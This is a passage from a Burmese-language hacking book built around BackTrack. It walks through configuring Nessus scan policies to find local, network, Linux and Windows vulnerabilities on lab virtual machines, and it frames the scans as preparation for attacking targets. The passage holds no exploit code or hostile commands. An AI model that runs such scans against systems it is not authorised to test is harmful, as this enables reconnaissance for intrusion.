http://www.backtrack-linux.org/wiki/index.php/Install_Flash_Player သို႕သြားေရာက္ရယူႏိုင္ပါ
သည္။

မ်က္ပြင့္စာေပ 81
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Nessus – finding local vulnerabilities


ယခုအခ်ိန္တြင္ Nessus ကို Install ျပဳလုပ္ထားၿပီး Configure ျပဳလုပ္ထားၿပီး ျဖစ္သည္႕အတြက္
ပထမဆံုးအေနျဖင့္ Vulnerabilities ကိုရွာေဖြျခင္းကို စမ္းသပ္ၾကည္႕ၾကပါမည္။ ေရးခ်ယ္ထားေသာ Feed
အေပၚမူတည္၍ Vulnerability မ်ား၏ က်ယ္ျပန္႕ေသာ Range ျဖင့္ တိုက္ခိုက္ေစႏိုင္ရန္ Nessus မွ ခြင့္ျပဳ
ေပးထားပါသည္။ ထို႕အျပင္ ယခင္အခန္းတြင္ ရွာေဖြထားေသာ အခ်က္အလက္မ်ားကို အေျခခံ၍
အားနည္းခ်က္မ်ား ရွာေဖြျခင္းကိုလည္း ျပဳလုပ္ေဆာင္ရြက္ေစႏိုင္မည္ျဖစ္သည္။ ယခုအပိုင္းတြင္ အသံုးျပဳ
ႏိုင္ေသာ Operating System မ်ားမွာ

- Windows XP
- Windows 7
- Metasploitable 2
- Any other flavor of Linux တိ႕ု ျဖစ္ပါသည္။

ယခုအပိုင္းကို စတင္လုပ္ေဆာင္ရန္အတြက္ Mozilla Firefox ကဲ့သ႕ို ေသာ Web Browser ကို အသံုးျပဳႏိုင္
ပါသည္။ ယခုအပိုင္းတြင္ Local Vulnerabilities မ်ားကိုရွာေဖြျခင္းကို ေဖာ္ျပေပးမည္႕ျဖစ္သည္႕အတြက္
ေအာက္တြင္ေဖာ္ျပထားေသာ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ေဖာ္ျပေပးထားပါသည္။

၁။ Nessus ကို Login ၀င္ေရာက္ရန္အတြက္ Firefox မွ Http://127.0.0.1:8834 ဟုရိုက္ထည္႕ပါ။

၂။ Policies သိ႕ု သြားေရာက္ပါ။

၃။ Add Policy ကို Click ႏိွပ္ပါ။

82 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ General Tab ေပၚမွ ေအာက္ပါ အလုပ္မ်ားကို လုပ္ေဆာင္ႏိုင္ေစပါမည္။

 စစ္ေဆးမည္႕နာမည္တစ္ခုကိုေရြးခ်ယ္ေပးရပါမည္။ ယခုအခ်ိန္တြင္Local Vulnerabilities


ဟူ၍ေရြးခ်ယ္ထားေသာ္လည္းႏွစ္သက္ရာမည္သည္႕နာမည္ကို မဆို ေရြးခ်ယ္ေပးထားႏိုင္
ပါသည္။
 Visibility တြင္ Option ႏွစ္ခုရိွၿပီး
o Shared: အျခားေသာ User မ်ားမွလည္း ယခု Scan ကုိ အသံုးျပဳေစႏိုင္မည္
ျဖစ္ကာ
o Private: လက္ရိွအသံုးျပဳေနေသာ User မွသာလွ်င္ အသံုးျပဳေစႏိုင္မည္။
 ယခုေပၚေနေသာ Page ေပၚမွ အျခားေသာ ေရြးခ်ယ္စရာမ်ားကို ေျပာင္းလဲျခင္းမျပဳဘဲ
နဂိုအတိုင္းထားပါ
 Next တြင္ Click ႏိွပ္ပါ။

၅။ Plugin Tab ေပၚတြင္ Disable All ႏွင့္ ေအာက္တြင္သတ္မွတ္ထားေသာ Vulnerabilities မ်ားကို ေရြး
ခ်ယ္ေပးႏိုင္ပါသည္။

 Ubuntu Local Security Checks


 Default Unix Accounts တို႕ျဖစ္သည္။

မ်က္ပြင့္စာေပ 83
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ အသစ္ျပဳလုပ္ထားေသာ Policy ကုိ သိမ္းဆည္းႏိုင္ေစရန္ Submit တြင္ Click ႏိွပ္ပါ။

၇။ Main Menu ေပၚမွ Scans Menu Option တြင္ Click ႏိွပ္ပါ။

၈။ Add Scan ခလုတ္တြင္ Click ႏိွပ္ျခင္းျဖင့္ ေအာက္ပါလုပ္ေဆာင္ခ်က္မ်ားကို လုပ္ေဆာင္ေစႏိုင္ပါသည္။

i. Scan ျပဳလုပ္မည္႕နာမည္ကို ထည္႕သြင္းေပးရပါမည္။ ယင္းသို႕ေပးထားျခင္းသည္ တစ္ခ်ိန္


တည္းတြင္ Scan တစ္ခုထက္ ပိုမို ေမာင္းႏွင္အသံုးျပဳေစႏိုင္သည္႕အတြက္ အသံုး၀င္ေစမည္
ျဖစ္သည္။ ၄င္းသည္လက္ရိွအသံုးျပဳထားေသာ Scan မ်ားျဖင့္ ကြျဲ ပားေစသည္။
ii. Scan ျပဳလုပ္မည္႕အမ်ိဳးအစားကို ေရြးခ်ယ္ေပးပါ။
a. Run Now : Default အေနျဖင့္အသံုးျပဳထားၿပီးျဖစ္သည္။ ယင္း Option သည္ Scan
ျပဳလုပ္ျခင္းကို ခ်က္ခ်င္းအသံုးျပဳေစႏိုင္သည္။
b. Scheduled: Scan ျပဳလုပ္ေစမည္႕ ေန႕ရက္မ်ား၊ အခ်ိန္မ်ားကို သတ္မွတ္ေပးထားႏိုင္
သည္။
c. Template : Template တစ္ခုကဲ့သို႕ပင္ Scan ကို သတ္မွတ္ထားႏိုင္ေစသည္။
iii. ထို႕ေနာက္ Scan Policy ကို သတ္မွတ္ေပးရပါမည္။ ယခုသတ္မွတ္ျခင္းတြင္ Local Vulner-
abilities Policy ကိုယခုအခန္း၏ အေစာပိုင္းတြင္ ေဖာ္ျပထားခဲ့ၿပီး ျဖစ္ပါသည္။
iv. ေအာက္တြင္ေဖာ္ျပထားေသာ Point မ်ားတြင္ ေရြးခ်ယ္ေပးျခင္းျဖင့္ Target ကို သတ္မွတ္ေပး
ႏိုင္မည္ျဖစ္သည္။
a. Target တစ္ခုစီကုိ Line တစ္လိုင္းစီျဖင့္လည္း သတ္မွတ္ႏိုင္သည္။

84 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

b. Line တစ္ခုစီတြင္ Target ၏ Range မ်ားကိုလည္း သတ္မွတ္ေပးေစႏိုင္မည္။


v. ထိုသို႕မဟုတ္လွ်င္လည္း Target File (Target File ရိွပါက) ကိုလည္း Upload ျပဳလုပ္ျခင္း
သို႕မဟုတ္ Add Target IP Address ကိုေရြးခ်ယ္ျခင္းမ်ားကိုလည္း ေဆာင္ရြက္ႏိုင္မည္ျဖစ္
သည္။

၉။ Launch Scan တြင္ Click ႏိွပ္ပါ။

၁၀။ ထိုအခါ Information မ်ားကိုရရိွေစမည္ျဖစ္ၿပီး စမ္းသပ္ျခင္းကိုလည္း ၿပီးဆံုးေစမည္ျဖစ္သည္


(ထိုအခ်က္သည္ Target မ်ားကို မည္မွ် မ်ားျပားစြာေရြးခ်ယ္ထားသည္ ဆိုသည္႕အခ်က္ႏွင့္ Test မ်ား၏
အေရအတြက္ကို ေဆာင္ရြက္သည္ ဆိုသည္႕အခ်က္အေပၚတြင္ မူတည္မည္ျဖစ္သည္)

၁၁။ ၿပီးဆံုးသည္႕အခါတြင္ Report တစ္ခုကို ရရိွေစမည္ျဖစ္သည္။

၁၂။ ေအာက္တြင္ေဖာ္ျပထားေသာ Point မ်ားကို စီစစ္ႏိုင္ရန္အတြက္ Report ေပၚတြင္ Double Click


ႏိွပ္ေပးရပါမည္။

i. Target တစ္ခုစီအတြက္ ေတြ႕ရိွရမည္႕ အားနည္းခ်က္ Vulnerability မ်ားကို List လုပ္


ေဖာ္ျပေပးေစမည္။
ii. Port မ်ားႏွင့္ သက္ဆိုင္ေသာ Port တစ္ခုစီကို ျမင္ေတြ႕ေစႏိုင္ရန္ IP Address ေပၚတြင္
Double Click ႏိွပ္ေပးရပါမည္။
iii. ရွာေဖြထားေသာ အေၾကာင္းအရာမ်ား၊ အားနည္းခ်က္ Vulnerability မ်ားကို ရွာေဖြေတြ႕ရိွ
ျခင္းကို ၾကည္႕ရႈႏိုင္ရန္ Severity Level Column (Total, High, Medium, Low မ်ားပါရိွ သည္)
မွ နံပါတ္မ်ားတြင္ Click ႏိွပ္ၾကည္႕ရွဳႏိုင္သည္။

မ်က္ပြင့္စာေပ 85
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၃။ Reports Main Menu ေပၚမွ Download Report တြင္ Click ျပဳလုပ္ႏိုင္ပါသည္။

Nesssus – finding Network Vulnerabilities


လိုအပ္ခ်က္အေပၚမူတည္၍ က်ယ္ျပန္႕ေသာ Vulnerabilities (အားနည္းခ်က္ယိုေပါက္မ်ား) ကို Attack
ျပဳလုပ္ရန္အတြက္ Nessus ကိုထပ္မံအသံုးျပဳႏိုင္ပါသည္။ ယခုအပိုင္းတြင္ တိုက္ခိုက္လိုေသာ Target မွ
Network အားနည္းခ်က္ယိုေပါက္မ်ားကို ရွာေဖြရန္အတြက္ Nessus ကို Configure ျပဳလုပ္ပံုကို ေလ့လာ
ၾကည္႕ၾကပါမည္။ ထုိအခ်က္ကိုအသံုးခ်၍ ထုိးေဖာက္၀င္ေရာက္မႈမ်ားကို ျပဳလုပ္ရာတြင္ အသံုးျပဳႏိုင္ပါ
သည္။ ယခုလုပ္ေဆာင္ခ်က္ကိုအသံုးျပဳရာတြင္ ေအာက္တြင္ေဖာ္ျပထားေသာ OS မ်ားကို Virtual
Machines ျဖင့္အသံုးျပဳထားရပါမည္။

 Windows XP
 Windows 7
 Metasploitable 2
 Network firewall or router
 Any other flavor of Linux

စတင္လုပ္ေဆာင္ရန္အတြက္ Mozilla firefox ကိုဖြင့္ၿပီးေနာက္ ေအာက္ပါအဆင့္အလိုက္ လုပ္ေဆာင္ေပး


ရပါမည္။

၁။ http://127.0.0.1:8834 သို႕သြားေရာက္၍ Nessus ကို Login ၀င္ေရာက္ရပါမည္။

၂။ Policies သိ႕ု သြားေရာက္ပါ။

၃။ Add Policy သိ႕ု ထပ္မံသြားေရာက္ရပါမည္။

86 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ General Tab ေပၚတြင္ ေအာက္တြင္ေဖာ္ျပထားေသာ အလုပ္မ်ားကိုလုပ္ေဆာင္ေစႏိုင္ပါသည္။

i. Scan ျပဳလုပ္မည္႕ အမည္ကို ထည္႕သြင္းရပါမည္။ ယခုေနရာတြင္ Internal Network Scan


ဟုအမည္ေပးထားေသာ္လည္း ႏွစ္သက္ရာအမည္ကိုလည္းအသုံးျပဳႏိုင္ပါသည္။
ii. Visibility တြင္ Option ႏွစ္ခုရိွပါသည္။
a. Shared : အျခားေသာ User မ်ားတြင္လည္း ယခုေဖာ္ျပပါ Scan လုပ္ေဆာင္ႏိုင္စြမ္းရိွပါ
သည္။
b. Private: ထို Scan သည္ လက္ရိွအသံုးျပဳေနေသာ User တြင္သာလုပ္ေဆာင္ႏိုင္ပါသည္။
iii. အျခားေသာ ျပင္ဆင္ရမည္႕အခ်က္မ်ားကို မျပင္ဆင္ဘဲ Defualt အတိုင္းသာထားေပးရပါ
မည္။
iv. Submit တြင္ Click ႏိွပ္ပါ။

၅။ Plugins Tab တြင္ Disable All ကို Click ႏိွပ္ၿပီး ေအာက္တြင္ေဖာ္ျပထားေသာ Vulnerablities မ်ားကို
သာေရြးခ်ယ္ေပးထားရပါမည္။ ၄င္းတို႕မွာ

 CISCO
 DNS
 Default Unix Accounts
 FTP

မ်က္ပြင့္စာေပ 87
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Firewalls
 Gain a shell remotely
 General
 Netware
 Peer-To-Peer File Sharing
 Policy Compliance
 Port Scanners
 SCADA
 SMTP Problems
 SNMP
 Service Detection
 Settings တိ႕ု ျဖစ္သည္။

၆။ New Policy ကို Save မွတ္ရန္ Submit တြင္ Click ႏိွပ္ပါ။

၇။ Main Menu ေပၚတြင္ Scans Menu Option ေပၚတြင္ Click ႏိွပ္ပါ။

၈။ Add Scan ခလုတ္တြင္ click ႏိွပ္ၿပီးေအာက္တြင္ေဖာ္ျပထားေသာ အလုပ္မ်ားကိုလုပ္ေဆာင္ရပါမည္။

88 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

i. Scan ျပဳလုပ္ရန္အတြက္အမည္ကိုထည္႕သြင္းေပးရပါမည္။ ၄င္းသည္ တခ်ိန္တည္းတြင္ Scan


တစ္ခုထက္ပိုမိုျပုလုပ္သည္႕အခါတြင္အသံုး၀င္ေစပါသည္။ လက္ရိွ အသံုးျပဳေနေသာ Scan
မ်ားကို differentiate ျပဳလုပ္ရန္အတြက္နည္းလမ္းတစ္ခုလည္းျဖစ္ပါသည္။
ii. Scan ျပဳလုပ္မည္႕အမ်ိဳးအစားကိုေဖာ္ျပေပးရပါမည္။
a. Run Now: ပံုမွန္အားျဖင့္ Enable ျပဳလုပ္ထားပါသည္။ ထို Option သည္ Scan ကို
ခ်က္ခ်င္းလက္ငင္း စတင္ရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။
b. Scheduled: Scan ျပဳလုပ္မည္႕ ေန႕ရက္ႏွင့္ အခ်ိန္မ်ားကို သတ္မွတ္ေပးေစႏိုင္ပါသည္။
c. Template: Scan ျပဳလုပ္ျခင္းကို Template ပံုစံျဖင့္ သတ္မွတ္ရန္အတြက္ အသံုးျပဳႏိုင္ပါ
သည္။
iii. Scan Policy ကိုသတ္မွတ္ေပးရပါမည္။ ယခုေနရာတြင္ ျပဳလုပ္ထားခဲ့ၿပီးျဖစ္သည္႕ Internal
Network Scan Policy ကိုအသံုးျပဳပါမည္။
iv. ေအာက္တြင္ေဖာ္ျပထားသည္႕ Point မ်ားအရ target မ်ားကိုေရြးခ်ယ္ေပးရပါမည္။
a. Target မ်ားကို Line တစ္လိုင္းတြင္ တစ္ခုအေနျဖင့္ သတ္မွတ္ေပးရပါမည္။
b. လိုင္းတစ္ခုစီတြင္ Target ၏ Range မ်ားကိုလည္း သတ္မွတ္ထားရပါမည္။
v. အကယ္၍ ရိွခဲ့ပါက Target ဖိုင္ကို Upload ျပဳလုပ္ႏိုင္ၿပီး သို႕မဟုတ္ပါက Add Target IP
Address ကို ေရြးခ်ယ္သတ္မွတ္ေပးႏိုင္ပါသည္။

၉။ Launch Scan တြင္ Click ႏိွပ္ပါ။

မ်က္ပြင့္စာေပ 89
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ Confirmation တစ္ခုကို ရရိွမည္ျဖစ္ၿပီး Test ျပဳလုပ္ျခင္းလည္း ၿပီးဆံုးမည္ျဖစ္သည္။ (Target မည္မွ်


ကိုေရြးခ်ယ္သတ္မွတ္ထားသည္ဆိုေသာအခ်က္ႏွင့္ ျပဳလုပ္ထားသည္႕ Test အေရအတြက္တြင္လည္း
မူတည္ႏိုင္ပါသည္)

၁၁။ ၿပီးဆံုးသြားေသာအခါတြင္ Report တစ္ခုကိုရရိွေစမည္ျဖစ္ပါသည္။

၁၂။ ေအာက္တြင္ေဖာ္ျပထားေသာ Point မ်ားကို Analyze ျပဳလုပ္ရန္အတြက္ Report ေပၚတြင္ Double


Click ႏိွပ္ပါ။

i. Target တစ္ခုစီအတြက္ ေတြ႕ရိွရမည္႕ Vulnerability မ်ားကို List လုပ္ေဖာ္ျပေပးမည္ျဖစ္


ပါသည္။
ii. Ports မ်ားႏွင့္ သက္ဆိုင္ဖြယ္ရာရိွေသာ Port တစ္ခုစီကို ေတြ႕ျမင္ႏိုင္ရန္အတြက္ IP Address
ေပၚတြင္ Double Click ႏိွပ္ၿပီး ၾကည္႕ရွဳႏိုင္ပါသည္။
iii. သက္ဆိုင္ေသာ Vulnerabilities ေတြ႕ရိွမႈမ်ားကို ေတြ႕ရိွႏိုင္ရန္အတြက္ (Total, High,
Medium, သိ႕ု မဟုတ္ Low) မ်ားရိွေသာ Severity Level Column မ်ားေအာက္မွ နံပါတ္မ်ား
ေပၚတြင္ Click ႏိွပ္၍ ၾကည္႕ရွဳႏိုင္ပါသည္။

၁၃။ Report Main Menu မွ Download Report ေပၚတြင္ Click ႏိွပ္ရပါမည္။



90 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Nessus – finding linux-specific Vulnerabilities


Nessus သည္ အသံုးျပဳလိုေသာ အေနအထားေပၚမူတည္၍ က်ယ္ျပန္႕ေသာ အားနည္းခ်က္ယိုေပါက္မ်ား
ကို Attack ျပဳလုပ္ႏိုင္ရန္အတြက္ ခြင့္ျပဳေပးပါသည္။ ယခုအပိုင္းတြင္ Linux ေပၚတြင္ Vulnerability
ရွာေဖြျခင္းကို Nessus ကိုအသံုးျပဳ၍ ရွာေဖြၾကည္႕ၾကမည္ျဖစ္သည္။ Network ေပၚတြင္ ေမာင္းႏွင္ထား
ေသာ Linux Machine ေပၚတြင္ အားနည္းခ်က္ယိုေပါက္မ်ားကို ရွာေဖြရန္အတြက္အသံုးျပဳႏိုင္ပါသည္။

ယခုအပိုင္းကိုစမ္းသပ္ရန္အတြက္ Attack ျပဳလုပ္မည္႕ကြန္ပ်ဴတာသည္

 Metasplotiable 2
 Any other flavor of linux တိ႕ု ျဖစ္ေစရပါမည္။

လုပ္ကိုင္ေဆာင္ရြက္ရန္အတြက္ Mozilla Firefox Web Browser ကိဖ


ု ြင့္ထားၿပီးေအာက္ပါအတိုင္း အဆင့္
အလိုက္ လုပ္ေဆာင္ၾကည္႕ရပါမည္။

၁။ http://127.0.0.1:8834 ကုိဖြင့္၍ Nessus ကို Login ၀င္ေရာက္ရပါမည္။

၂။ Policies သိ႕ု သြားေရာက္ရပါမည္။

၃။ Add Policy ကို Click လုပ္ရပါမည္။

၄။ General Tab ေပၚတြင္ ေအာက္ပါ Task မ်ားကို လုပ္ေဆာင္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 91
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

i. Scan ျပဳလုပ္မည္႕ အမည္ကိုထည္႕သြင္းေပးရပါမည္။ ယခုေနရာတြင္ Linux Vulnerabilities


ဟုေပးထားေသာ္လည္း ႏွစ္သက္ရာနာမည္ကိုအသံုးျပဳႏိုင္ပါသည္။
ii. Visibility တြင္ Option ႏွစ္ခုရိွပါသည္။ ၄င္းတို႕မွာ
a. Shared : အျခားေသာ User မ်ားသည္လည္း ယခု Scan ကိုလုပ္ေဆာင္ႏိုင္ခြင့္ရိွပါသည္။
b. Private : လက္ရိွအသံုးျပဳေနေသာ User တြင္သာ Scan လုပ္ေဆာင္ခြင့္ရိွပါသည္။
iii. ဤ Screen တြင္ရိွေသာ အျခားေသာ Option မ်ားကို Default အတိုင္းသာထားရပါမည္။
iv. Next တြင္ Click ႏိွပ္ပါ။

၅။ Plugins tab ေပၚတြင္ Disable All ကို Click ႏိွပ္ၿပီးေနာက္ ေအာက္တြင္ေဖာ္ျပထားေသာ


Vulnerabilities မ်ားကို ေရြးခ်ယ္ထားရပါမည္။ တိုက္ခိုက္မည္႕ Linux Target တြင္ အသံုးျပဳမည္႕ Services
မ်ားကို စစ္ေဆးျခင္းျဖစ္၍ အနည္းငယ္မွ် မ်ားျပားပါလိမ့္မည္။

 Backdoors
 Brute Force Attacks
 CentOS Local Security Checks
 DNS
 Debian Local Security Checks
 Default Unix Accounts
 Denial of Service
 FTP
 Fedora Local Security Checks
 Firewalls
 FreeBSD Local Security Checks
 Gain a shell remotely
 General
 Gentoo Local Security Checks
 HP-UX Local Security Checks

92 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Mandriva Local Security Checks


 Misc
 Port Scanners
 Red Hat Local Security Checks
 SMTP Problems
 SNMP
 Scientific Linux Local Security Checks
 Slackware Local Security Checks
 Solaris Local Security Checks
 SuSE Local Security Checks
 Ubuntu Local Security Checks
 Web Servers တိ႕ု ပင္ျဖစ္ၾကပါသည္။

၆။ New Policy ကို save လုပ္သိမ္းဆည္းရန္အတြက္ Submit တြင္ Click ႏိွပ္ရပါမည္။

၇။ Main Menu ေပၚမွ Scan menu Option တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၈။ Add Scan ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ၿပီးေနာက္ ေအာက္ပါ Task မ်ားကို လုပ္ေဆာင္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 93
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

i. Scan ျပဳလုပ္မည္႕အမည္ကို ထည္႕သြင္းေပးရပါမည္။ ၄င္းသည္ အခ်ိန္တစ္ခုတြင္ Scan


တစ္ခုထက္မက လုပ္ေဆာင္ရာတြင္အသံုး၀င္ေစႏိုင္ပါသည္။ ၄င္းသည္ လက္ရိွေမာင္းႏွင္ထား
ေသာ Scan ကို ကြျဲ ပားစြာသိသာေစပါသည္။
ii. Scan ျပဳလုပ္မည္႕အမ်ိဳးအစားကို ေရြးခ်ယ္သတ္မွတ္ေပးရပါမည္။
 Run Now : ပံုမွန္အားျဖင့္ Enable ျပဳလုပ္ထားေလ့ရိွပါသည္။ Scan ကို ခ်က္ခ်င္း
လက္ငင္းေမာင္းႏွင္ရန္အတြက္အသံုးျပဳႏိုင္ပါသည္။
 Scheduled : Scan ျပဳလုပ္မည္႕ ေန႕ရက္ႏွင့္အခ်ိန္မ်ားကို သတ္မွတ္ေပးႏိုင္ပါသည္။
 Template : Template ပံုစံျဖင့္ Scan ျပဳလုပ္ရန္အတြက္ သတ္မွတ္ေပးႏိုင္ပါသည္။
iii. Scan Policy ကိုေရြးခ်ယ္ေပးရပါမည္။ ယခုအေနအထားတြင္ အထက္တြင္ျပဳလုပ္ထားခဲ့ေသာ
Linux Vulnerabilities Policy ကိုအသံုးျပဳရပါမည္။
iv. Target မ်ားကို ေရြးခ်ယ္သတ္မွတ္ရန္အတြက္ ေအာက္ပါ Point မ်ားကိုသတ္မွတ္ေပးသင့္ပါ
သည္။
 Target မ်ားကို လိုင္းတစ္ခုလွ်င္ တစ္ခုႏႈန္းျဖင့္ သတ္မွတ္ရပါမည္။
 လိုင္းတစ္လိုင္းစီမွ Target မ်ား၏ Range မ်ားကိုလည္း သတ္မွတ္ေပးရပါမည္။
 အကယ္၍ ရိွပါက Target ဖိုင္ကို Upload ျပဳလုပ္ရမည္ျဖစ္ၿပီး သိ႕ု မဟုတ္ပါက Add Target
IP Address ကိုသတ္မွတ္ေပးရပါမည္။

၉။ Launch Scan ကို Click ႏိွပ္ေပးရပါမည္။

94 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ Confirmation တစ္ခုကိုရရိွမည္ျဖစ္ၿပီး စမ္းသပ္ျခင္းကိုလည္း အဆံုးသတ္ႏိုင္မည္ျဖစ္ပါသည္။ (၄င္း


သည္ Target မ်ား မည္မွ်ေရြးခ်ယ္ထားျခင္းႏွင့္ Test မ်ား၏ အေရအတြက္ကို လုပ္ေဆာင္ျခင္းဆိုသည္႕
အခ်က္တြင္လည္း မူတည္ႏိုင္ပါသည္)

၁၁။ ၿပီးဆံုးသြားေသာအခါတြင္ Report တစ္ခုကို ရရိွေစမည္ျဖစ္ပါသည္။

၁၂။ Report တြင္ Double Click ႏိွပ္ျခင္းျဖင့္ ေအာက္ပါအခ်က္မ်ားကို Analyze ျပဳလုပ္ႏိုင္ပါသည္။

i. Target တစ္ခုစီတြင္ေတြ႕ရိွရမည္႕ Vulnerability မ်ားကို List လုပ္ေဖာ္ျပေပးပါမည္။


ii. IP Address ေပၚတြင္ Double Click ႏိွပ္ျခင္းျဖင့္ Port မ်ားကိုေတြ႕ျမင္ႏိုင္မည္ျဖစ္ၿပီး Port
တစ္ခုစီျဖင့္ သက္ဆိုင္ေသာ အေၾကာင္းအရာမ်ားကိုလည္း ေတြ႕ျမင္ရမည္ျဖစ္ပါသည္။
iii. Serverity Level Column မ်ား (Total, High, Medium, Low) ေအာက္တြင္ရိွေသာ နံပါတ္
မ်ားကို Click ႏိွပ္ျခင္းျဖင့္ သတ္မွတ္ထားေသာအျခင္းအရာမ်ား၊ ေတြ႕ရိွထားေသာ
Vulnerabilities မ်ား၏ List စာရင္းမ်ားကိုရရိွႏိုင္ပါသည္။

၁၃။ Reports Main Menu မွ Download Report ေနရာတြင္ Click ႏိွပ္ေပးရပါမည္။

Nessus – finding Windows-specific Vulner-


abilities
ယခုအပိုင္းတြင္ Nessus ကိုအသံုးျပဳ၍ Windows တင္ထားေသာ Machine မ်ားတြင္ သတ္မွတ္ထားေသာ
Vulnerability မ်ားရွာေဖြျခင္းကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ တိုက္ခိုက္လိုေသာ Machine သည္ Window
စနစ္ေမာင္းႏွင္ထားေသာ Machine ျဖစ္ရန္လည္း လိုအပ္ပါသည္။

စမ္းသပ္ရန္အတြက္ Windows XP သိ႕ု မဟုတ္ Windows 7 တင္ထားေသာ Computer ကို Virtual


Machines ျဖင့္ တြဘ
ဲ က္အသံုးျပဳထားလွ်င္လည္း ျဖစ္ႏိုင္ပါသည္။ စတင္လုပ္ေဆာင္ၾကည္႕ရန္အတြက္
ေအာက္ပါအဆင့္မ်ားကို လုပ္ေဆာင္ေပးႏိုင္ပါသည္။ လုပ္ေဆာင္ရန္အတြက္ ထံုးစံအတိုင္းပင္ Firefox ကို
ဖြင့္လ်က္လုပ္ေဆာင္ရျခင္းျဖစ္သည္။

၁။ http://127.0.0.1:8834 သို႕ Nessus ကို Login ၀င္ေရာက္ရန္အတြက္ ဖြင့္ေပးရပါမည္။


မ်က္ပြင့္စာေပ 95
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Policies သိ႕ု သြားေရာက္ပါ။

၃။ Add Policy ကို Click ႏိွပ္ပါ။

၄။ General Tab ေပၚမွ ေအာက္တြင္ေဖာ္ျပထားေသာ Tasks မ်ားကို လုပ္ေဆာင္ေပးရပါမည္။

i. Scan ျပဳလုပ္မည္႕ အမည္တစ္ခုကို ေရြးခ်ယ္ေပးရပါမည္။ ယခုေနရာတြင္ Windows Vulner-


abilities ဟုသတ္မွတ္ေပးထားေသာ္လည္း ႀကိဳက္ႏွစ္သက္ရာအမည္တစ္ခုခုကို ေရြးခ်ယ္
သတ္မွတ္ ေပးထားႏိုင္ပါသည္။
ii. Visibility တြင္ Option ႏွစ္ခုရိွပါသည္။
 Shared : အျခား User မ်ားမွလည္း Scan ျပဳလုပ္ျခင္းကိုလုပ္ေဆာင္ႏိုင္ေစသည္။
 Private : ယခုလက္ရိွအသံုးျပဳေနေသာ User မွသာ Scan ျပဳလုပ္ႏိုင္မည္ျဖစ္ပါသည္။
iii. ယခုေတြ႕ျမင္ရေသာ Screen ေပၚမွအျခားေျပာင္းလဲႏိုင္ေသာ Option မ်ားကို မူလ(Default)
အတိုင္းသာထားရပါမည္။
iv. Next ကို Click ႏိွပ္ပါ။

၅။ Plugins Tab ေပၚတြင္ Disable All ကို ေရြးခ်ယ္ၿပီးေနာက္ ေအာက္တြင္ေဖာ္ျပထားေသာ Vulner-


abilities Option မ်ားကို ေရြးခ်ယ္ေပးထားရပါမည္။ ၄င္းတို႕သည္ Window System တြင္ အသံုးျပဳေသာ
Service မ်ားလည္း ျဖစ္ၾကပါသည္။

 DNS

96 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Databases
 Denial of Service
 FTP
 SMTP Problems
 SNMP
 Settings
 Web Servers
 Windows
 Windows: Microsoft Bulletins
 Windows: User management တို႕ျဖစ္ၾကပါသည္။

၆။ New Policy ကို Save ျပဳလုပ္ရန္အတြက္ Submit ေပၚတြင္ Click ႏိွပ္ပါ။

၇။ Main Menu ေပၚမွ Scans Menu Option တြင္ ထပ္မံ Click ႏိွပ္ပါ။

၈။ Add Scan ခလုတ္တြင္ Click ႏိွပ္ၿပီးေနာက္ ေအာက္တြင္ေဖာ္ျပထားေသာ အလုပ္မ်ားကုိ ေဆာင္ရြက္ရ


ပါမည္။

